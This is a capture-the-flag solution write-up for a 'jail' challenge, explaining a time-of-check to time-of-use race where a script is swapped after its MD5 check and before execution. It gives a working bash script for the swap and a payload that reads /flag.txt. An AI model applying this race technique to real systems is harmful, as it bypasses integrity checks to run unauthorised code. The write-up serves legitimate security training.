write-ups-challenges-2022-2023/break-from-the-jail/level-3/SOLUTION.md
2022-11-24 22:59:22 +01:00

44 lines
1.0 KiB
Markdown

# Hack the Jail - Part 2
## Difficulty
Hard.
## How To solve
The key insight of this challenge is that the file is opened twice: once for checking whether
the MD5sum matches the expected value, and the second time for actually executing the file.
This type of vulnerabity is called a "Time-of-check to time-of-use" or in short a TOCTTOU attack.
The challenge contains an artificially long timeout to be able to exploit this vulnerabity more easily.
The script below performs the actual attack:
```bash
#!/bin/bash
# run the vulnerable program in the backgrouncd
./execute &
# make sure that the check has been performed
sleep 1
# then replace the program with our malicious program
mv hello_world.sh hello_world.sh.old
cp read.sh hello_world.sh
# wait until the "execute" program has finished.
sleep 8
# clean up
rm hello_world.sh
mv hello_world.sh.old hello_world.sh
```
The contents of the `read.sh` file are as follows:
```
#!/bin/bash
cat /flag.txt
```
Both files need to have executable permissions which can be obtained using `chmod +x *.sh`.